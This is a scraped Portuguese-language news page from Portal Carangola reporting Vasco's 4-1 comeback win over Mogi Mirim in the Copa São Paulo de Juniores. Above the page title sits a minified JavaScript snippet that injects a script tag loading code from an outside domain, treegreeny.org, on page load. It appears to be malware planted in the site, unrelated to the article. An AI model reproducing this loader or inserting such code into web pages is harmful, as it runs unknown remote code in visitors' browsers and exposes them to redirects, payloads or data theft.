;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vasco leva susto, mas goleia o Mogi Mirim - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Vasco leva susto, mas goleia o Mogi Mirim

O Vasco estreou bem na Copa São Paulo de Juniores. De virada, o time carioca goleou por 4 a 1 o Mogi Mirim, na noite deste sábado, no Estádio Bruno Lazzarini, em duelo válido pelo Grupo Q da competição. Destaque para o atacante Carlos Antônio, que anotou três gols. No outro jogo da chave, o Lemense-SP bateu por 2 a 1 o Atlético Rondoniense-RO. Desta forma, os cariocas, com os mesmos três pontos, são líderes já que levam vantagem no saldo de gols.

Flamengo-SP 1 x 0 Jaguaré-ES

As equipes voltam a campo na próxima terça-feira. Na preliminar, às 16h, os donos da casa encaram o Mogi. No segundo duelo do dia, às 18h, o time carioca enfrenta a equipe de Rondônia; os jogos são sempre realizados no Bruno Lazzarini.

Com bom toque de bola, o Vasco começou mandando no jogo, mas logo o Mogi se encontrou e tomou as rédeas. Aos 18, Romário, homônimo de um dos grandes ídolos cruzmaltinos, abriu o placar para os paulistas. Ele recebeu na área e bateu seco de esquerda. A equipe carioca sentiu o golpe e passou ao menos cinco minutos envolvida.

Contudo, logo o Vasco se recuperou e passou a criar as melhores oportunidades. Quando o jogo se encaminhava para o intervalo, o meio de campo construiu boa jogada. O centroavante Éder surgiu na lateral e cruzou na área. O camisa 10 cruzmaltino, Roger, dividiu com o zagueiro adversário Jeferson e a bola parou no fundo da rede. 1 a 1.

O time de São Januário voltou a todo vapor para a segunda etapa e criou boas situações. Aos 11 minutos, o gol de Carlos Antônio decretou a virada. Dois minutos depois, Dico recebeu na entrada da área e por pouco não ampliou. Aos 22, Romário empatou, mas o lance foi anulado porque o atacante estava em posição de impedimento.

Apesar do susto, o Vasco tinha o domínio do jogo e seguiu assustando. Em contrapartida, o Mogi errava muitos passes e ainda facilitava a vida do adversário. Em boa trama, Éder recebeu livre, mas bateu mascado, sem grande perigo. Aos 34, o mesmo Éder deu belo passe para Carlos Antônio que fez seu segundo no jogo e colocou 3 a 1 no marcador. Aos 41, ele marcou de novo, anotando seu terceiro e dando números finais à partida.

Ofertas: Calotas, rodas, pneus